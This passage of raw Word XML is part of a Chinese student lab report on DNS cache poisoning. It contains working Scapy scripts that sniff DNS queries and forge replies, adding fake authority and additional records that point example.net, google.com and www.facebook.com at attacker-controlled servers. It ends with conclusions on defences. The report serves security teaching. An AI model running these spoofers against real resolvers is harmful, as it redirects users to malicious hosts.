          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定位另一个域</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w14:paraId="159230CD" w14:textId="046E84EF" w:rsidR="00D11A11" w:rsidRDefault="00332D13" w:rsidP="00332D13">
      <w:pPr>
        <w:wordWrap w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00332D13">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在上一次攻击中，我们成功破坏了本地</w:t>
      </w:r>
      <w:r w:rsidRPr="00332D13">
        <w:t>DNS服务器的缓存，因此Attacker32.com成为example.com域的名称服务器。受此成功启发，我们希望将其影响扩展到其他领域。也就是说，在由查询www.example.net触发的欺骗响应中，我们想在“授权”部分中添加其他条目，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以</w:t>
      </w:r>
      <w:r w:rsidRPr="00332D13">
        <w:t>Attacker32.com也被用作google.com的名称服务器。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EEE6E1D" w14:textId="57CF43C2" w:rsidR="00332D13" w:rsidRDefault="00332D13" w:rsidP="009F7866">
      <w:r w:rsidRPr="00332D13">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>下面是使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00332D13">
        <w:t>scapy编写的欺骗程序代码：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C9EA99" w14:textId="4567512D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coding=utf-8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39B9C2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py.all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2C9840F0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FFFB85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poof_dns(pkt):  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62611054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NS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ww.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DNS].qd.qname):  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BC5FC0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Ppkt = IP(dst=pkt[IP].src, src=pkt[IP].dst)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B21E8C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DPpkt = UDP(dport=pkt[UDP].sport, sport=53)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D4A9382" w14:textId="6777A155" w:rsidR="007D20CA" w:rsidRPr="00A629FF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nssec = DNSRR(rrname=pkt[DNS].qd.qname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1.1.1.1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375258C" w14:textId="2A4FA865" w:rsidR="00A629FF" w:rsidRPr="007D20CA" w:rsidRDefault="00A629FF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   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#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构造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ample.net -&gt; attack32.com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的域名到服务器域名映射</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6109DA56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Ssec1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ttacker32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209F5AD" w14:textId="4CFBE2AA" w:rsidR="007D20CA" w:rsidRPr="00A629FF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Ssec2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google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600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ttacker32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6336188" w14:textId="0F21192C" w:rsidR="00A629FF" w:rsidRPr="007D20CA" w:rsidRDefault="00A629FF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  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#</w:t>
      </w:r>
      <w:r w:rsidRPr="00A629FF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构造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attacker32.com -&gt;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2.2.2.2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的域名到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</w:t>
      </w:r>
      <w:r w:rsidRPr="00A629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的映射</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6322BEEB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sec1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ttacker32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2.2.2.2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7032BBE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sec2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ttacker32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3.3.3.3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FB1E0DA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NSpkt = DNS(id=pkt[DNS].id, qd=pkt[DNS].qd, aa=1, rd=0, qr=1,qdcount=1, ancount=1, nscount=2, arcount=2, an=Anssec, ns=NSsec1/NSsec2 ,ar=Addsec1/Addsec2)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460BFA50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poofpkt = IPpkt/UDPpkt/DNSpkt  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548EB736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nd(spoofpkt)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02177EE5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[+] got one"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A6BB65C" w14:textId="77777777" w:rsidR="007D20CA" w:rsidRPr="007D20CA" w:rsidRDefault="007D20CA" w:rsidP="007D20CA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 = sniff(filter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udp and dst port 53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rn=spoof_dns)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A559C57" w14:textId="021B1B58" w:rsidR="00D11A11" w:rsidRDefault="00E13165" w:rsidP="009F7866">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户机上看到的消息</w:t>
      </w:r>
      <w:r w:rsidR="00332D13">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如下，可以发现攻击成功</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266583A5" w14:textId="625DFA85" w:rsidR="00E13165" w:rsidRPr="007D20CA" w:rsidRDefault="00E13165" w:rsidP="00332D13">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00E13165">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A60B547" wp14:editId="6DA184C0">
            <wp:extent cx="5274310" cy="34594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55"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto"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CD47" w14:textId="610236B1" w:rsidR="009F7866" w:rsidRDefault="005208A4" w:rsidP="005208A4">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_Toc58529552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Task9：</w:t>
      </w:r>
      <w:r w:rsidR="00D11A11" w:rsidRPr="00D11A11">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定位附加部分</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w14:paraId="71671C66" w14:textId="192F7F72" w:rsidR="009F7866" w:rsidRDefault="00332D13" w:rsidP="009F7866">
      <w:r w:rsidRPr="00332D13">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="00332D13">
        <w:t>DNS答复中，有一个称为“附加节”的节，用于提供附加信息。实际上，它主要用于为某些主机名（尤其是在“授权”部分中出现的那些主机名）提供IP地址。此任务的目的是欺骗本节中的某些条目，并查看它们是否将被目标本地DNS服务器成功缓存。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E38FF85" w14:textId="2F1937EC" w:rsidR="00332D13" w:rsidRDefault="00332D13" w:rsidP="009F7866">
      <w:r w:rsidRPr="00332D13">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下面是使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00332D13">
        <w:t>scapy编写的欺骗程序代码：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DAE81DF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7D20CA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coding=utf-8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B94897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py.all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21229702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07EC83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poof_dns(pkt):  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16092DB1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NS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ww.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DNS].qd.qname):  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792A9971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Ppkt = IP(dst=pkt[IP].src, src=pkt[IP].dst)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724D8274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DPpkt = UDP(dport=pkt[UDP].sport, sport=53)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22928677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nssec = DNSRR(rrname=pkt[DNS].qd.qname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1.1.1.1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A3D537A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Ssec1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ttacker32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DB85DC4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Ssec2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.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4F1F801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Addsec1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ttacker32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2.2.2.2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1C402FF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sec2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s.example.net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3.3.3.3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7B3D92A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sec3 = DNSRR(rrnam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ww.facebook.com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ype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tl=259200, rdata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4.4.4.4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99EE2A4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NSpkt = DNS(id=pkt[DNS].id, qd=pkt[DNS].qd, aa=1, rd=0, qr=1,qdcount=1, ancount=1, nscount=2, arcount=3,an=Anssec, ns=NSsec1/NSsec2 ,ar=Addsec1/Addsec2/Addsec3)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F69AB3C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poofpkt = IPpkt/UDPpkt/DNSpkt  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DAE7B9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nd(spoofpkt)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF8969F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D20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[+] got one"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EB7399C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2A0C6F" w14:textId="77777777" w:rsidR="007D20CA" w:rsidRPr="007D20CA" w:rsidRDefault="007D20CA" w:rsidP="007D20C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 = sniff(filter=</w:t>
      </w:r>
      <w:r w:rsidRPr="007D20CA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udp and dst port 53'</w:t>
      </w:r>
      <w:r w:rsidRPr="007D20C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rn=spoof_dns)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BDE5CD" w14:textId="6CB85D01" w:rsidR="009F7866" w:rsidRPr="00332D13" w:rsidRDefault="00332D13" w:rsidP="009F7866">
      <w:r w:rsidRPr="00332D13">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在用户机</w:t>
      </w:r>
      <w:r w:rsidR="00CD2CE2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中dig返回的信息中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们可以看到</w:t>
      </w:r>
      <w:hyperlink r:id="rId35" w:history="1">
        <w:r w:rsidR="00CD2CE2" w:rsidRPr="001B6FE5">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>www</w:t>
        </w:r>
        <w:r w:rsidR="00CD2CE2" w:rsidRPr="001B6FE5">
          <w:rPr>
            <w:rStyle w:val="a8"/>
          </w:rPr>
          <w:t>.facebook.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00CD2CE2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>被解析为4.4.4.4，但在DNS缓存中</w:t>
      </w:r>
      <w:r w:rsidR="00CD2CE2" w:rsidRPr="00CD2CE2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不会被缓存，这是由于</w:t>
      </w:r>
      <w:r w:rsidR="00CD2CE2" w:rsidRPr="00CD2CE2">
        <w:t>additional中的记录只有与authority中匹配，dns缓存才会将其收入到dns的缓存中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212BF303" w14:textId="77777777" w:rsidR="00CD2CE2" w:rsidRDefault="00E13165" w:rsidP="00CD2CE2">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00E13165">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7BECF9AB" wp14:editId="35834E04">
            <wp:extent cx="4128770" cy="276825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16"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4148213" cy="278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724EA" w14:textId="6EBFDEEC" w:rsidR="00E420B9" w:rsidRDefault="00CD2CE2" w:rsidP="00CD2CE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dig</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回的信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4815B697" w14:textId="1490A4AC" w:rsidR="00774478" w:rsidRDefault="0081297F" w:rsidP="0044386F">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_Toc58529553"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>四</w:t>
      </w:r>
      <w:r w:rsidR="00852133">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实验</w:t>
      </w:r>
      <w:r w:rsidR="00CD4C02">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>结果与结论</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p w14:paraId="04C96786" w14:textId="7C059908" w:rsidR="0044386F" w:rsidRDefault="00043886" w:rsidP="00D86BC3">
      <w:pPr>
        <w:spacing w:before="180" w:after="180"/>
      </w:pPr>
      <w:r w:rsidRPr="00774478">
        <w:t>通过本次实验，我学习了</w:t>
      </w:r>
      <w:r w:rsidR="00D86BC3" w:rsidRPr="00D86BC3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:hint="eastAsia"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>DNS</w:t>
      </w:r>
      <w:r w:rsidR="00D86BC3" w:rsidRPr="00D86BC3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:hint="eastAsia"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>缓存中毒</w:t>
      </w:r>
      <w:r w:rsidRPr="00774478">
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidR="00D86BC3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击</w:t>
      </w:r>
      <w:r w:rsidRPr="00774478">
        <w:t>方法，加深了</w:t>
      </w:r>
      <w:r w:rsidR="00D86BC3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对DNS</w:t>
      </w:r>
      <w:r w:rsidRPr="00774478">
        <w:t>的了解，并能够编写简单的</w:t>
      </w:r>
      <w:r w:rsidR="00D86BC3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DNS</w:t>
      </w:r>
      <w:r w:rsidRPr="00774478">
        <w:t>欺骗程序。根据实验过程，我们可以根据该攻击的</w:t>
      </w:r>
      <w:r w:rsidR="008F1B42">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>过程</w:t>
      </w:r>
      <w:r w:rsidRPr="00774478">
        <w:t>来制定相应的预防措施。</w:t>
      </w:r>
      <w:r w:rsidR="00B1033A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目前，</w:t>
      </w:r>
      <w:r w:rsidR="00D86BC3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DNS缓存中毒</w:t>
      </w:r>
      <w:r w:rsidR="00B1033A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的防范主要从以下</w:t>
      </w:r>
      <w:r w:rsidR="00D86BC3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>五</w:t>
      </w:r>
      <w:r w:rsidR="00B1033A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个方面进行：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DC15CC" w14:textId="3F150230" w:rsidR="00D86BC3" w:rsidRPr="00D86BC3" w:rsidRDefault="00D86BC3" w:rsidP="00D86BC3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D86BC3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>限制递归查询以防止潜在的有针对性的中毒攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FBA566" w14:textId="1B4C6AEB" w:rsidR="00D86BC3" w:rsidRPr="00D86BC3" w:rsidRDefault="00D86BC3" w:rsidP="00D86BC3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D86BC3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>仅存储与请求域相关的数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C4BF41" w14:textId="53E098DD" w:rsidR="00D86BC3" w:rsidRPr="00D86BC3" w:rsidRDefault="00D86BC3" w:rsidP="00D86BC3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D86BC3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>限制响应以仅提供有关请求域的响应</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680237C6" w14:textId="1BAC2E0E" w:rsidR="00D86BC3" w:rsidRPr="00D86BC3" w:rsidRDefault="00D86BC3" w:rsidP="00D86BC3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D86BC3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>强制客户端使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86BC3">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>HTTPS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B64973D" w14:textId="7EBDBE2B" w:rsidR="00C37B3A" w:rsidRPr="00D86BC3" w:rsidRDefault="00D86BC3" w:rsidP="00D86BC3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D86BC3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>确保使用的是</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86BC3">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>BIND</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86BC3">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86BC3">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DNS</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86BC3">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>软件的最新版本，以便具有最新的安全修复程序。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DDDCFD" w14:textId="3578F44C" w:rsidR="00CD4C02" w:rsidRDefault="00332D13" w:rsidP="00CD4C02">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="_Toc58529554"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>五</w:t>
      </w:r>
      <w:r w:rsidR="00CD4C02">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、参考文献</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w14:paraId="5B74A45A" w14:textId="54524A24" w:rsidR="00B1033A" w:rsidRPr="00C37B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/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>杜文亮.计算机安全导论：深度实践[M].高等教育出版社:北京,2020:1-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C77D58" w14:textId="628AF123" w:rsidR="00B1033A" w:rsidRPr="00C37B3A" w:rsidRDefault="00D86BC3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D86BC3">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>blacksunny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Pr="00D86BC3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86BC3">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DNS缓存欺骗攻击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Pr="00D86BC3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86BC3">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>https://www.cnblogs.com/blacksunny/p/6910530.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D425C26" w14:textId="59987897" w:rsidR="00B1033A" w:rsidRDefault="00D86BC3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D86BC3">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>虫洞科技老王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="00B1033A" w:rsidRPr="00C37B3A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86BC3">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DNS缓存中毒攻击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="00B1033A" w:rsidRPr="00C37B3A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86BC3">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>https://zhuanlan.zhihu.com/p/144183767</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625B9DC3" w14:textId="3635DD0A" w:rsidR="00C37B3A" w:rsidRDefault="00D86BC3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D86BC3">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>菲宇</w:t>
      </w:r>
      <w:r w:rsidR="00C37B3A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86BC3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86BC3">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DNS(bind)服务器的安装与配置</w:t>
      </w:r>
      <w:r w:rsidR="00C37B3A" w:rsidRPr="00C37B3A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86BC3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86BC3">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>https://blog.csdn.net/bbwangj/article/details/82079405</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FBF3FB" w14:textId="7DF9F850" w:rsidR="00C37B3A" w:rsidRDefault="00D86BC3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D86BC3">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>安全命令</w:t>
      </w:r>
      <w:r w:rsidR="00C37B3A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00C37B3A" w:rsidRPr="00C37B3A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86BC3">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DNS缓存(DNS劫持)攻击过程演示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 w:rsidRPr="00D86BC3">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>https://blog.csdn.net/moruilichun/article/details/107734937</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335D5BF2" w14:textId="072B7A70" w:rsidR="00C3169B" w:rsidRPr="00C37B3A" w:rsidRDefault="00C3169B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capy官方文档.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3169B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C3169B">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>https://scapy.readthedocs.io/en/latest/_images/scapy_logo.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0442B8E3" w14:textId="18B568D2" w:rsidR="00B1033A" w:rsidRPr="00C37B3A" w:rsidRDefault="00B1033A" w:rsidP="00B1033A"/>
    <w:sectPr w:rsidR="00B1033A" w:rsidRPr="00C37B3A" w:rsidSect="00A203D5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6CBFA" w14:textId="77777777" w:rsidR="00A80F03" w:rsidRDefault="00A80F03" w:rsidP="00852133">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2B48EC4E" w14:textId="77777777" w:rsidR="00A80F03" w:rsidRDefault="00A80F03" w:rsidP="008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44292"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtEndPr/>
    <w:sdtContent>
      <w:p w14:paraId="0B0B2EA0" w14:textId="2763FBFB" w:rsidR="007D20CA" w:rsidRDefault="00A80F03">
        <w:pPr>
          <w:pStyle w:val="a5"/>
          <w:jc w:val="center"/>
        </w:pPr>
      </w:p>
    </w:sdtContent>
  </w:sdt>
  <w:p w14:paraId="4DF800EF" w14:textId="77777777" w:rsidR="007D20CA" w:rsidRDefault="007D20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721309"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtEndPr/>
    <w:sdtContent>
      <w:p w14:paraId="3D1317E4" w14:textId="77777777" w:rsidR="007D20CA" w:rsidRDefault="007D20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848F7" w14:textId="77777777" w:rsidR="007D20CA" w:rsidRDefault="007D20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7204" w14:textId="77777777" w:rsidR="00A80F03" w:rsidRDefault="00A80F03" w:rsidP="00852133">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="5E4BCFFD" w14:textId="77777777" w:rsidR="00A80F03" w:rsidRDefault="00A80F03" w:rsidP="0085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60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9E64D8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="145C7616"/>
    <w:lvl w:ilvl="0" w:tplc="4DCABE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33892"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0B18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69D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94708"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9752C336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9F153F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8D98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CD2DE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E63A0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CF77479"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3354AB20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532DDF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FF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06130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7D0139"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4DC4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716CA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E738CFB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3C756F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0F4AD7B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EB2048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7E505E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CD04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5058"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1FE88254"/>
    <w:lvl w:ilvl="0" w:tplc="4CF84F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940C48"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C2FA9A82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B81516"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="26C23B9E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BE6259"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="590CB0F8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BA62D8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7578DA5C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3E545E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BBD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793A6C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="295AA5F6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967C2A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="427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64CFC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="251631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1777B1"/>
    <w:multiLevelType w:val="multilevel"/>
